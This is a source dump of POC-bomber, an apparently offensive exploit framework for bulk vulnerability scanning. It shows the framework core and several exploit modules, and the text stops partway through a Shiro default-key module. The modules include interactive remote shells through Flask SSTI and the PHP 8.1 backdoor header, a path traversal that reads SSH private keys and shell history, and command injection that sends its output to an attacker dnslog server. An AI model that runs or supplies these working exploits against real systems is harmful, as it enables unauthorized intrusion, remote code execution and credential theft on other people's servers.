├── LICENSE ├── README.md ├── inc ├── common.py ├── config.py ├── console.py ├── dnslog.py ├── import_plugin.py ├── init.py ├── output.py ├── run.py └── thread.py ├── pocbomber.py ├── pocs ├── framework │ ├── flask │ │ └── flask_ssti.py │ ├── laravel │ │ ├── CVE_2017_16894.py │ │ └── CVE_2021_3129.py │ ├── nodejs │ │ ├── CVE_2017_14849.py │ │ └── CVE_2021_21315.py │ ├── php │ │ ├── php_81_backdoor.py │ │ ├── php_xdebug_rce.py │ │ └── phpinfo_inclusion.py │ ├── shiro │ │ └── shiro_defaultkey.py │ ├── spring │ │ ├── CVE_2018_1273.py │ │ ├── CVE_2021_21234.py │ │ ├── CVE_2022_22947.py │ │ ├── CVE_2022_22965.py │ │ ├── jolokia_logback_jndi_rce.py │ │ └── jolokia_realm_jndi_rce.py │ ├── struct2 │ │ ├── s2_001.py │ │ ├── s2_005.py │ │ ├── s2_007.py │ │ ├── s2_008.py │ │ ├── s2_009.py │ │ ├── s2_012.py │ │ ├── s2_013.py │ │ ├── s2_015.py │ │ ├── s2_016.py │ │ ├── s2_032.py │ │ ├── s2_045.py │ │ ├── s2_046.py │ │ ├── s2_048.py │ │ ├── s2_053.py │ │ ├── s2_057.py │ │ └── s2_061.py │ └── thinkphp │ │ ├── thinkphp2_rce.py │ │ ├── thinkphp32x_rce.py │ │ ├── thinkphp5022_5129.py │ │ ├── thinkphp5023_rce.py │ │ ├── thinkphp5_sqli.py │ │ ├── thinkphp_driver_display_rce.py │ │ ├── thinkphp_index_construct_rce.py │ │ ├── thinkphp_index_showid_rce.py │ │ ├── thinkphp_invoke_func_code_exec.py │ │ ├── thinkphp_lite_code_exec.py │ │ ├── thinkphp_method_filter_code_exec.py │ │ ├── thinkphp_multi_sql_leak.py │ │ ├── thinkphp_pay_orderid_sqli.py │ │ ├── thinkphp_request_input_rce.py │ │ └── thinkphp_view_recent_xff_sqli.py ├── middleware │ ├── apache │ │ ├── CVE_2017_15715.py │ │ ├── CVE_2021_36749.py │ │ ├── CVE_2021_41773.py │ │ ├── CVE_2021_42013.py │ │ └── log4j2_rce.py │ ├── jboss │ │ ├── CVE_2017_12149.py │ │ ├── CVE_2017_7501.py │ │ └── CVE_2017_7504.py │ ├── nginx │ │ └── nginx_parsing_vulnerability.py │ ├── tomcat │ │ ├── CVE_2017_12615.py │ │ ├── tomcat.war │ │ └── tomcat_weakpass_getshell.py │ └── weblogic │ │ ├── CVE_2014_4210.py │ │ ├── CVE_2016_0638.py │ │ ├── 
CVE_2016_3510.py │ │ ├── CVE_2017_10271.py │ │ ├── CVE_2017_3248.py │ │ ├── CVE_2017_3506.py │ │ ├── CVE_2018_2628.py │ │ ├── CVE_2018_2893.py │ │ ├── CVE_2018_2894.py │ │ ├── CVE_2019_2725.py │ │ ├── CVE_2019_2729.py │ │ ├── CVE_2019_2890.py │ │ ├── CVE_2020_14882.py │ │ └── CVE_2020_2551.py ├── ports │ ├── memcache_unauth_11211.py │ ├── redis_6379.py │ ├── rsync_unauth_873.py │ ├── sunlogin_rce.py │ └── zookeeper_unauthorized.py ├── redteam │ ├── fanwei_e-cology_uploadOperation_fileupload_2022.py │ ├── fanwei_e-cology_verifyquicklogin_loginbypass_2022.py │ ├── h3c_cvm_fileupload_2022.py │ ├── huatiandongli_oa_fileupload_2022.py │ ├── landray_oa_admindo_jndiinject_2021.py │ ├── landray_oa_treexml_rce_2022.py │ ├── lvmeng_nsfocus_nf_fileupload_2022.py │ ├── mingyu_fileread_2022.py │ ├── prtg_default_pwd_rce.py │ ├── ruijie_nbr_fileupload.py │ ├── seeyon_oa_ajaxdo_fileupload_2022.py │ ├── seeyon_oa_wpsassistservlet_fileupload_2022.py │ ├── tongda_oa_2016_fileupload.py │ ├── tongda_oa_fileinclude_2020.py │ ├── tongda_oa_qyapp-vote-submit_sqli.py │ ├── tongda_oa_v11-8_apialiphp_fileupload.py │ ├── topsec_management_rce_2022.py │ ├── wangkang_firewall_rce_2021.py │ ├── wanhu_oa_fileupload-controller_fileupload_2022.py │ ├── wanhu_oa_smartupload_fileupload.py │ ├── yongyou_chanjet_login_sqli.py │ ├── yongyou_grp-u8_proxy_xxe-sqli_2022.py │ ├── yongyou_grp-u8_uploadfiledata_fileupload_2022.py │ ├── yongyou_nc_file-receive-servlet_fileupload_2021.py │ ├── yongyou_nc_fileupload_2022.py │ ├── yongyou_nc_rce_2022.py │ ├── yongyou_ufida_ksoa_fileupload_2022.py │ └── zentao_cnvd-2022-42853_sqli.py └── web │ ├── CVE_2021_22205.py │ ├── CVE_2021_40870.py │ ├── atlassian │ └── CVE_2022_26134.py │ ├── dahua │ └── CVE_2021_33044.py │ ├── discuz │ └── discuz67x_rce.py │ ├── f5 │ └── CVE_2022_1388.py │ ├── fanruan │ └── fanruan_oa_v9_fileupload.py │ ├── h2database │ └── h2console_unauth.py │ ├── h3c │ └── h3c_imc_rce.py │ ├── hikvision │ ├── CVE_2017_7921.py │ └── CVE_2021_36260.py │ 
├── jenkins │ └── CVE_2018_1000861.py │ ├── landray │ └── landray_oa_custom_jsp_fileread.py │ ├── seeyon │ ├── seeyon_a6_sqli.py │ ├── seeyon_get_sessionslist.py │ ├── seeyon_oa_a8_htmlofficeservlet_getshell.py │ └── seeyon_thirdpartycontroller_getshell.py │ ├── tongda │ ├── tongda_oa_fake_user.py │ ├── tongda_sqli_getdata_php.py │ └── tongda_videofile_fileread.py │ ├── ueditor_1433_parsing_vulnerabilitly.py │ ├── vmware │ ├── CVE_2021_21972.py │ └── CVE_2022_22954.py │ ├── weaver │ ├── CNVD_2019_32204.py │ ├── CNVD_2019_34241.py │ ├── CNVD_2021_49104.py │ ├── TestFile_weaver_common_ctrl_upload.zip │ ├── e_cology_v8_sqli.py │ ├── e_cology_workflowservicexml_rce.py │ ├── weaver_common_ctrl_upload.py │ └── weaver_ecology_getsqldata_sqli.py │ ├── wordpress │ └── CVE_2018_7422.py │ ├── yongyou │ └── yongyou_nc-find-web_fileread.py │ └── zabbix │ └── CVE_2022_23131.py ├── requirements.txt └── 更新日志.txt /inc/config.py: -------------------------------------------------------------------------------- 1 | # POC bomber config 2 | 3 | # 进度显示(默认开启) 4 | show_progress = True 5 | # 输出文件(默认为空) 6 | output_path = r'' 7 | 8 | # 线程池最大数量 9 | max_threads = 30 10 | # 单条poc最大超时 11 | timeout = 15 12 | # 休眠间隔(默认不休眠,如开启线程默认1) 13 | delay = 0 14 | 15 | 16 | ## Dnslog 配置(需要在vps上启动poc-bomber的dnslog服务端) 17 | # 自己购买域名设置的ns记录(对应a记录指向vps) 18 | dnslog_base_domain = "" 19 | # dnslog是否需要认证 20 | dnslog_is_auth = True 21 | # 如需认证,在此配置密码 22 | dnslog_auth_token = "123456" 23 | # dnslog http服务端口 24 | dnslog_web_port = 5000 25 | # dnslog服务端ip 26 | dnslog_server_ip = "" 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /inc/console.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | from inc import init 4 | from inc import run, output, common, dnslog 5 | import sys 6 | 7 | def pocbomber_console(): 8 | """控制台""" 9 | if common.get_value("dnslog_flag") and not 
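common.get_value("target_list"):
    # --dnslog without targets: this process IS the dnslog server (run it on the VPS).
    dnslog.dnslog_server()
    sys.exit()
if common.get_value("dnslog_flag") and common.get_value("target_list"):
    # --dnslog with targets: client side, scan and report back to the dnslog server.
    dnslog.start_dnslog_scan()
if common.get_value("delay"):
    # A per-request delay only makes sense with one worker; force it here.
    common.set_value("max_threads", 1)
if common.get_value("show"):
    output.show(common.get_value("script_list"))
    sys.exit()
if not common.get_value("target_list"):
    output.usage()
    sys.exit()

print('\n[*] starting {0}\n'.format(output.get_time1()))
output.start_output()
target_list = common.get_value("target_list")
script_list = common.get_value("script_list")
output.log_info('检测到 {0} 个目标, 已加载 {1} 条POC'.format(len(target_list), len(script_list)))
run.verify(target_list, script_list)
output.close_output()
if common.get_value('attack'):
    output.log_info('检测到--attack参数, 开始尝试调用exp')
    # --attack is interactive and only ever runs ONE (target, poc) pair -- the first of
    # each list.  Say so instead of silently ignoring the rest, and do not index into an
    # empty script list (no POC matched the -p filter) -- that used to raise IndexError.
    if not script_list:
        output.log_error('未加载到任何POC, 无法调用exp')
    else:
        if len(target_list) > 1 or len(script_list) > 1:
            output.log_info('--attack 仅对第一个目标调用第一条POC的exp: {0} / {1}'.format(target_list[0], script_list[0]))
        if run.attack(target_list[0], script_list[0]):
            output.log_success('ATTACK END! enjoy : ) ')
        else:
            output.log_error('ATTACK FAIL! What\'s wrong?')

print('\n[+] ending {0}\n'.format(output.get_time1()))


# -------------------------------------------------------------------------------- /inc/import_plugin.py: --------------------------------------------------------------------------------
# https://raw.githubusercontent.com/tr0uble-mAker/POC-bomber/d2433ac41eaa58eb4fb0876ec05e3b645e10ecd7/inc/import_plugin.py
# -------------------------------------------------------------------------------- /inc/init.py: --------------------------------------------------------------------------------
from inc import common, config, output
import platform, queue


def init_all():
    """Populate the shared key/value store from the CLI arguments and config.py.

    Runs once at import time (see the guard at the bottom of this module); every
    other module reads the values back through ``common.get_value``.  Each CLI
    option falls back to the matching ``config`` value when it was not given.
    """
    output.logo()
    args = common.get_parser()
    common._init()
    poc_path, poc_list = common.do_path(args.poc)
    # Sentinel telling the import-time guard below that initialisation already ran.
    common.set_value("tr0uble_mAker", True)
    common.set_value("os", "windows" if "Windows" in platform.system() else "linux")
    common.set_value("show_progress", bool(config.show_progress))
    common.set_value("show", bool(args.show))  # --show
    common.set_value("output_path", args.output or config.output_path)  # --output
    common.set_value("max_threads", args.threads or config.max_threads)  # --threads
    common.set_value("timeout", args.timeout or config.timeout)  # --timeout
    common.set_value("delay", args.delay or config.delay)  # --delay
    common.set_value('dnslog_flag', bool(args.dnslog))  # --dnslog
    common.set_value('attack', bool(args.attack))  # --attack
    common.set_value("target_list", [args.url] if args.url else common.get_target_list(args.file))  # --url,--file
    common.set_value("pocinfo_dict", common.get_pocinfo_dict())
    common.set_value("script_list", common.get_poc_scriptname_list_by_search(poc_path, poc_list))
    common.set_value("total_times", len(common.get_value("target_list")) * len(common.get_value("script_list")))
    common.set_value("current_times", 0)
    common.set_value("success_times", 0)
    common.set_value("output_queue", queue.Queue())
    common.set_value("exit_queue", queue.Queue())
    common.set_value("success_list", [])
    # dnslog parameters (only used with --dnslog; values come from config.py)
    common.set_value("dnslog_base_domain", config.dnslog_base_domain)
    common.set_value("dnslog_is_auth", config.dnslog_is_auth)
    common.set_value("dnslog_auth_token", config.dnslog_auth_token)
    common.set_value("dnslog_web_port", config.dnslog_web_port)
    common.set_value("dnslog_server_ip", config.dnslog_server_ip)
    common.set_value("dnslog_scan_dict", {})


# Import-time side effect: the first ``from inc import init`` anywhere runs the whole
# initialisation, argument parsing included.  NOTE(review): this reads the store
# before ``common._init()`` has run, so ``get_value`` presumably tolerates an
# uninitialised store -- confirm in common.py.
if not common.get_value("tr0uble_mAker"):
    init_all()
# -------------------------------------------------------------------------------- /inc/run.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# coding=utf-8
from inc import init
from inc import thread, common, output
# Silence urllib3's InsecureRequestWarning once: the PoCs call requests with verify=False.
from urllib3.exceptions import InsecureRequestWarning
from urllib3 import disable_warnings
disable_warnings(InsecureRequestWarning)


def verify(target_list, script_list):
    """Queue every (target, poc) pair into the thread pool and run them all.

    ``target_list`` holds the URLs to test, ``script_list`` the loaded PoC script
    names.  Results are delivered by the pool to the output/dnslog queues; nothing
    is returned.
    """
    thread_pool = thread.ThreadPool()
    for current_target in target_list:
        for script in script_list:
            thread_pool.add_task(current_target, script)
    thread_pool.start_threadpool()


def attack(target, script):
    """Run the interactive ``attack()`` of one PoC module against one target.

    Returns True when the PoC reports success, False otherwise.  An unknown script
    name, a PoC module without an ``attack`` function, or an exception raised inside
    the PoC all yield False -- the cause is logged now instead of being swallowed,
    because the console can only print a generic "ATTACK FAIL" otherwise.
    """
    try:
        return bool(common.get_value("pocinfo_dict")[script].attack(target))
    except Exception as exc:
        output.log_error('exp 调用异常: {0!r}'.format(exc))
        return False
# -------------------------------------------------------------------------------- /inc/thread.py: --------------------------------------------------------------------------------
from inc import init
from inc import common
from inc import output, dnslog
import queue, time, threading
import concurrent.futures
from func_timeout import func_set_timeout, FunctionTimedOut


class ThreadPool():
    """Thread-pool runner for (target, poc) verification tasks.

    Tasks are queued with ``add_task`` and executed by ``start_threadpool``; every
    result dict is routed to the dnslog scanner or to the output queue by
    ``do_result``.
    """

    def __init__(self):
        self.max_thread = common.get_value('max_threads')
        self.thread_pool = concurrent.futures.ThreadPoolExecutor(max_workers=self.max_thread)
        self.task_queue = queue.Queue()
        self.futures = {}

    def add_task(self, func, target):
        """Queue one task.

        NOTE: despite the parameter names, run.verify calls this as
        ``add_task(target_url, script_name)`` and ``start_threadpool`` unpacks the
        tuple in exactly that order; the names are kept for call compatibility.
        """
        self.task_queue.put((func, target))

    def start_threadpool(self):
        """Drain the task queue through the executor and dispatch every result.

        With a ``delay`` configured the run is effectively serial (the console forces
        max_threads=1): each future is awaited before the next submit and the sleep is
        applied between tasks.  Without a delay everything is submitted first and the
        results are dispatched as they complete.  The executor is shut down even if a
        result handler raises.
        """
        delay = common.get_value("delay")
        try:
            while not self.task_queue.empty():
                current_target, current_script = self.task_queue.get()
                future = self.thread_pool.submit(self.run_signel_poc, current_target, current_script)
                self.futures[future] = (current_target, current_script)
                if delay:
                    self.do_result(future.result())
                    time.sleep(delay)
            if not delay:
                for future in concurrent.futures.as_completed(self.futures):
                    self.do_result(future.result())
        finally:
            self.thread_pool.shutdown()

    # The timeout value is read ONCE, when this class body executes at import time
    # (inc.init has already run by then); it is not re-read per call.
    @func_set_timeout(common.get_value('timeout'))
    def set_fuc_timeout(self, func, arg):
        """Call ``func(arg)`` under the global per-PoC timeout; raises FunctionTimedOut."""
        return func(arg)

    def run_signel_poc(self, current_target, current_script):
        """Run one PoC's verify() against one target and return its result dict.

        The PoC's own dict is annotated with ``url`` and ``script``.  On timeout -- or
        on any other exception inside the PoC -- a minimal dict with ``timeout: True``
        is returned so the output layer always sees the keys it expects; a non-timeout
        failure additionally carries ``error`` so that PoC bugs (bad script name,
        exception in verify, non-dict return) are no longer indistinguishable from
        real timeouts.
        """
        try:
            result = self.set_fuc_timeout(common.get_value("pocinfo_dict")[current_script].verify, current_target)
            result["url"] = current_target
            result["script"] = current_script
            return result
        except FunctionTimedOut:
            return {
                "url": current_target,
                "script": current_script,
                "timeout": True,
            }
        except Exception as exc:
            # Shaped like a timeout result for the output layer; ``error`` is informational.
            return {
                "url": current_target,
                "script": current_script,
                "timeout": True,
                "error": repr(exc),
            }

    def do_result(self, result):
        """Route one result: dnslog-based PoCs go to the dnslog scanner, all others to output."""
        if result.get("dnslog_domain"):
            dnslog.dnslog_add_scan(result)
        else:
            output.put_output_queue(result)
# -------------------------------------------------------------------------------- /pocbomber.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# coding=utf-8
############################
#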
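Author tr0uble_mAker #
###########################

from inc import console


def main():
    """Entry point: hand control to the console (argument handling lives in inc.init)."""
    console.pocbomber_console()


if __name__ == '__main__':
    main()
# -------------------------------------------------------------------------------- /pocs/framework/flask/flask_ssti.py: --------------------------------------------------------------------------------
import requests
import re
import urllib
import random
from urllib import parse


def verify(url):
    """Detect Jinja2/Flask SSTI with a ``{{a*b}}`` arithmetic probe in the ``name`` query parameter.

    Two random 4-digit factors are multiplied server-side; the target is flagged only
    when their product shows up in the response.  Returns the standard PoC result
    dict; ``vulnerable`` stays False on any request error.
    """
    relsult = {
        'name': 'Flask-ssti 代码执行漏洞',
        'vulnerable': False,
        'attack': True,
    }
    try:
        rand_num1 = random.randint(1000, 9999)
        rand_num2 = random.randint(1000, 9999)
        payload = r'/?name={{%d*%d}}' % (rand_num1, rand_num2)
        rand_product = rand_num1 * rand_num2
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
        }
        vurl = urllib.parse.urljoin(url, payload)
        req = requests.get(vurl, headers=headers, timeout=3)
        # A 7-8 digit product appearing by coincidence elsewhere in the page is unlikely
        # but not impossible; treat a single hit as an indicator rather than proof.
        if re.search(str(rand_product), req.text):
            relsult['vulnerable'] = True
            relsult['method'] = 'GET'
            relsult['url'] = url
            relsult['payload'] = vurl
            relsult['about'] = 'https://blog.csdn.net/yukinorong/article/details/106938717'
        return relsult
    except requests.RequestException:
        return relsult


def attack(url):
    """Interactive shell through the SSTI: read commands from stdin until ``exit``.

    The percent-encoded template walks ``[].__class__.__base__.__subclasses__()`` for
    ``catch_warnings``, reaches ``eval`` through its ``__init__.__globals__`` and runs
    ``os.popen(cmd).read()``.  Command output is recovered by diffing the whitespace-
    separated tokens of the page fetched with an empty ``name`` against the page
    fetched with the payload.  The command is URL-quoted but otherwise inserted
    into a double-quoted Python string, so quotes in a command break the payload.
    Typing ``exit`` now ends the loop without being sent to the target.
    """
    try:
        base_payload = '?name=%7b%25%20%66%6f%72%20%63%20%69%6e%20%5b%5d%2e%5f%5f%63%6c%61%73%73%5f%5f%2e%5f%5f%62%61%73%65%5f%5f%2e%5f%5f%73%75%62%63%6c%61%73%73%65%73%5f%5f%28%29%20%25%7d%0d%0a%7b%25%20%69%66%20%63%2e%5f%5f%6e%61%6d%65%5f%5f%20%3d%3d%20%27%63%61%74%63%68%5f%77%61%72%6e%69%6e%67%73%27%20%25%7d%0d%0a%20%20%7b%25%20%66%6f%72%20%62%20%69%6e%20%63%2e%5f%5f%69%6e%69%74%5f%5f%2e%5f%5f%67%6c%6f%62%61%6c%73%5f%5f%2e%76%61%6c%75%65%73%28%29%20%25%7d%0d%0a%20%20%7b%25%20%69%66%20%62%2e%5f%5f%63%6c%61%73%73%5f%5f%20%3d%3d%20%7b%7d%2e%5f%5f%63%6c%61%73%73%5f%5f%20%25%7d%0d%0a%20%20%20%20%7b%25%20%69%66%20%27%65%76%61%6c%27%20%69%6e%20%62%2e%6b%65%79%73%28%29%20%25%7d%0d%0a%20%20%20%20%20%20%7b%7b%20%62%5b%27%65%76%61%6c%27%5d%28%27%5f%5f%69%6d%70%6f%72%74%5f%5f%28%22%6f%73%22%29%2e%70%6f%70%65%6e%28%22{0}%22%29%2e%72%65%61%64%28%29%27%29%20%7d%7d%0d%0a%20%20%20%20%7b%25%20%65%6e%64%69%66%20%25%7d%0d%0a%20%20%7b%25%20%65%6e%64%69%66%20%25%7d%0d%0a%20%20%7b%25%20%65%6e%64%66%6f%72%20%25%7d%0d%0a%7b%25%20%65%6e%64%69%66%20%25%7d%0d%0a%7b%25%20%65%6e%64%66%6f%72%20%25%7d'
        print('[+] 开始执行命令,输出exit退出!')
        while True:
            cmd = input('[+] 执行命令 >')
            if cmd == 'exit':
                # Stop before sending: the original still ran "exit" on the target once.
                break
            payload = base_payload.format(parse.quote(cmd))
            vurl = urllib.parse.urljoin(url, payload)
            rep1 = requests.get(urllib.parse.urljoin(url, '?name='), timeout=3)
            rep2 = requests.get(vurl, timeout=3)
            # raw strings: '[\S]*' in a plain string is an invalid escape sequence.
            baseline = set(re.findall(r'[\S]*', rep1.text))
            for token in re.findall(r'[\S]*', rep2.text):
                if token != '' and token not in baseline:
                    print(token)
        return True
    except (requests.RequestException, EOFError):
        return False
# -------------------------------------------------------------------------------- /pocs/framework/laravel/CVE_2017_16894.py: --------------------------------------------------------------------------------
import requests
import urllib, re


def verify(url):
    """Check for a web-exposed Laravel ``.env`` file (CVE-2017-16894).

    The target is flagged when ``/.env`` contains ``APP_NAME=Laravel`` but the site
    root does NOT; the second request filters out catch-all pages that echo the
    same text for every path.  (The original compared ``re.search(...) is not True``,
    which is always true because ``re.search`` never returns ``True`` -- the
    baseline check therefore never filtered anything.)  Deployments that renamed
    APP_NAME are not detected.
    """
    relsult = {
        'name': 'Laravel DEBUG 敏感数据泄露(CVE-2017-16894)',
        'vulnerable': False,
        'attack': False,
        'url': url,
    }
    timeout = 3
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ",
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    payload = '/.env'
    vurl = urllib.parse.urljoin(url, payload)
    try:
        rep1 = requests.get(vurl, headers=headers, timeout=timeout, verify=False)
        if re.search("APP_NAME=Laravel", rep1.text):
            rep2 = requests.get(url, headers=headers, timeout=timeout, verify=False)
            if not re.search("APP_NAME=Laravel", rep2.text):
                relsult['vulnerable'] = True
                relsult['verify'] = vurl
        return relsult
    except requests.RequestException:
        return relsult
# -------------------------------------------------------------------------------- /pocs/framework/nodejs/CVE_2017_14849.py: --------------------------------------------------------------------------------
import requests
import re
import urllib
from urllib import request
import time


def verify(url):
    """Node.js path traversal (CVE-2017-14849): read /etc/passwd and /etc/hosts.

    Requests go through ``urllib.request`` instead of ``requests`` -- presumably
    because the ``../`` dot-segments must reach the server verbatim and the
    requests/urllib3 stack normalises them away (TODO confirm).  ``urlopen``
    verifies TLS certificates, so HTTPS targets with self-signed certs fail and
    are reported as not vulnerable.
    """
    relsult = {
        'name': 'Node.js 目录穿越漏洞(CVE-2017-14849)',
        'vulnerable': False,
        'attack': True,
    }

    try:
        url = url.rstrip('/')
        base_payload = "/static/../../../a/../../../../{0}"
        vurl1 = url + base_payload.format('etc/passwd')
        vurl2 = url + base_payload.format('etc/hosts')
        with request.urlopen(vurl1, timeout=3) as rep1:
            rep1_txt = rep1.read().decode('utf-8')
        with request.urlopen(vurl2, timeout=3) as rep2:
            rep2_txt = rep2.read().decode('utf-8')
        if re.search("root:x:", rep1_txt) and re.search("localhost", rep2_txt):
            relsult['vulnerable'] = True
            relsult['url'] = url
            relsult['payload'] = vurl1
            relsult['about'] = 'https://www.cnblogs.com/r00tuser/p/7805005.html'
        return relsult
    except Exception:
        # URLError/HTTPError, ValueError on a malformed URL, UnicodeDecodeError on a
        # binary body: any failure just means "not confirmed".
        return relsult


def attack(url):
    """Dump a fixed list of interesting files through the traversal and print each one."""
    url = url.rstrip('/')
    base_payload = "/static/../../../a/../../../..{0}"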
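lists = [
    "/etc/passwd",
    "/etc/group",
    "/etc/hosts",
    "/etc/motd",
    "/etc/issue",
    "/etc/bashrc",
    "/etc/apache2/apache2.conf",
    "/etc/apache2/ports.conf",
    "/etc/apache2/sites-available/default",
    "/etc/httpd/conf/httpd.conf",
    "/etc/httpd/conf.d",
    "/etc/httpd/logs/access.log",
    "/etc/httpd/logs/access_log",
    "/etc/httpd/logs/error.log",
    "/etc/httpd/logs/error_log",
    "/etc/init.d/apache2",
    "/etc/mysql/my.cnf",
    "/etc/nginx.conf",
    "/opt/lampp/logs/access_log",
    "/opt/lampp/logs/error_log",
    "/opt/lamp/log/access_log",
    "/opt/lamp/logs/error_log",
    "/proc/self/environ",
    "/proc/version",
    "/proc/cmdline",
    "/proc/mounts",
    "/proc/config.gz",
    "/root/.bashrc",
    "/root/.bash_history",
    "/root/.ssh/authorized_keys",
    "/root/.ssh/id_rsa",
    "/root/.ssh/id_rsa.keystore",
    "/root/.ssh/id_rsa.pub",
    "/root/.ssh/known_hosts",
]
# Several of these are credential material (id_rsa, bash_history, environ); make
# sure the engagement scope covers pulling them before running --attack.
try:
    for file in lists:
        try:
            print('[*] 尝试读取文件: {0} ......'.format(file))
            vurl = url + base_payload.format(file)
            with request.urlopen(vurl, timeout=5) as rep:
                print(rep.read().decode('utf-8'))
        except Exception:
            # 404/403, connection errors or undecodable content: report and move on.
            print('[-] {0} 读取失败'.format(file))
    return True
except Exception:
    return False
#  -------------------------------------------------------------------------------- /pocs/framework/nodejs/CVE_2021_21315.py: --------------------------------------------------------------------------------
import requests
import re
import urllib
import inc.dnslog
from urllib import parse


def verify(url):
    """systeminformation command injection (CVE-2021-21315) -- weak, reflected check.

    Sends ``name[]=$(whoami)`` to ``/api/getServices`` and flags the target when the
    response is HTTP 200, contains ``pcpu`` and ``pmem`` and contains the literal
    ``whoami``.  NOTE(review): the submitted service name can simply be echoed back
    in the JSON, so the ``whoami`` match does not prove execution -- this mostly
    fingerprints the endpoint.  ``attack()`` confirms execution out-of-band via
    dnslog.
    """
    relsult = {
        'name': 'Node.js命令注入漏洞(CVE-2021-21315)',
        'vulnerable': False,
        'attack': True,
    }
    try:
        cmd = 'whoami'
        payload = '/api/getServices?name[]=%24({0})'.format(cmd)
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
        }
        vurl = urllib.parse.urljoin(url, payload)
        req = requests.get(vurl, headers=headers, timeout=3)
        if re.search(cmd, req.text) and req.status_code == 200 and re.search('pcpu', req.text) and re.search('pmem', req.text):
            relsult['vulnerable'] = True
            relsult['method'] = 'GET'
            relsult['url'] = url
            relsult['payload'] = vurl
            relsult['about'] = 'https://blog.csdn.net/xuandao_ahfengren/article/details/115549714'
        return relsult
    except requests.RequestException:
        return relsult


def attack(url):
    """Run one command and read its output back through a dnslog subdomain.

    Requires --dnslog.  The command is wrapped as ``ping `<cmd>`.<dnslog-domain>`` so
    its (single-label) output becomes the leftmost DNS label of the lookup; the
    label is then extracted from the dnslog records.  Output containing dots,
    spaces or more than 63 characters will not survive as a DNS label.  Returns
    True when a result was recovered, False otherwise.
    """
    try:
        dnslog = inc.dnslog.Dnslog()
        dnslog_domain = dnslog.dnslog_getdomain()
        if not dnslog_domain:
            print('[-] 需要结合dnslog平台进行验证,请追加 --dnslog 参数来运行此exp!!!')
            return False
        print('[+] 检测到--dnslog参数, 尝试验证漏洞......')
        # Escape the domain: the original used it unescaped, so its dots matched anything.
        cmd_rex = r'([^.]+)\.' + re.escape(dnslog_domain)
        print('[+] 获取到dnslog随机域名: ', dnslog_domain)
        base_payload = '/api/getServices?name[]=%24(ping `{0}`.' + dnslog_domain + ')'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
        }
        cmd = input('[+] 执行命令 >')
        vurl = urllib.parse.urljoin(url, base_payload.format(cmd))
        try:
            # ping keeps the request open; the 1 s timeout is expected to fire.
            requests.get(vurl, headers=headers, timeout=1)
        except requests.RequestException:
            pass
        print('[+] 正在结合dnslog获取执行命令结果......')
        dnslog.dnslog_sleep()
        dnslog_rep_str = dnslog.dnslog_getrep()
        found = re.findall(cmd_rex, dnslog_rep_str)
        if not found:
            print('[-] 未获取到执行结果, 请手工验证命令是否执行成功?')
            return False
        print('[*] 成功获取到执行结果:', found[0])
        return True
    except Exception:
        return False
# -------------------------------------------------------------------------------- /pocs/framework/php/php_81_backdoor.py: --------------------------------------------------------------------------------
import requests, re
import urllib


def verify(url):
    """PHP 8.1.0-dev backdoored build: a ``User-Agentt`` header starting with ``zerodium`` is evaluated.

    Probes with ``var_dump(233*233)`` and flags the target when ``int(54289)`` is
    echoed in the body.
    """
    relsult = {
        'name': 'PHP 8.1.0-dev 开发版本后门',
        'vulnerable': False,
        'attack':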
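True,
}
headers = {
    'Accept-Encoding': 'gzip, deflate',
    'Accept': '*/*',
    'Accept-Language': 'en',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
    # 233*233 == 54289; a PHP-style "int(54289)" in the body proves the header was evaluated.
    'User-Agentt': 'zerodiumvar_dump(233*233);',
    'Connection': 'close',
}
try:
    rep = requests.get(url, headers=headers, timeout=3)
    # raw string: 'int\(54289\)' in a plain string is an invalid escape sequence.
    if re.search(r'int\(54289\)', rep.text):
        relsult['vulnerable'] = True
        relsult['url'] = url
        relsult['method'] = 'GET'
        relsult['payload'] = headers['User-Agentt']
        relsult['about'] = 'https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md'
        relsult['attack'] = True
    return relsult
except requests.RequestException:
    return relsult


def attack(url):
    """Interactive shell: each command is sent as ``zerodiumsystem("<cmd>");`` in User-Agentt.

    The command is interpolated into a PHP double-quoted string unescaped, so a
    command containing ``"`` breaks the payload.  Typing ``exit`` ends the loop
    without sending it to the target (the original sent it once).  Returns True
    on a clean exit, False on a request error.
    """
    try:
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
            'User-Agentt': '',
            'Connection': 'close',
        }
        base_payload = 'zerodiumsystem("{0}");'
        while True:
            cmd = input('[+] 执行命令:')
            if cmd == 'exit':
                break
            headers['User-Agentt'] = base_payload.format(cmd)
            rep = requests.get(url, headers=headers, timeout=3)
            print(rep.text)
        return True
    except (requests.RequestException, EOFError):
        return False
# -------------------------------------------------------------------------------- /pocs/framework/shiro/shiro_defaultkey.py: --------------------------------------------------------------------------------
import requests


def verify(url):
    """Probe Apache Shiro for the well-known default ``rememberMe`` key.

    Runs only after ``check_shiro`` confirmed the target answers a bogus
    ``rememberMe`` cookie with ``rememberMe=deleteMe``.  Each entry of
    ``payload_dict`` maps a key to a pre-built rememberMe cookie value; when the
    server accepts it (no ``deleteMe`` in the response headers) the key is
    reported.  Redirects are not followed because ``deleteMe`` is set on the
    first response.
    """
    relsult = {
        'name': 'Shiro 默认密钥',
        'vulnerable': False,
        'attack': False,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)',
    }
    # key -> rememberMe cookie value built for that key (blob taken from the original
    # PoC; what it deserialises to is not visible here).
    payload_dict = {
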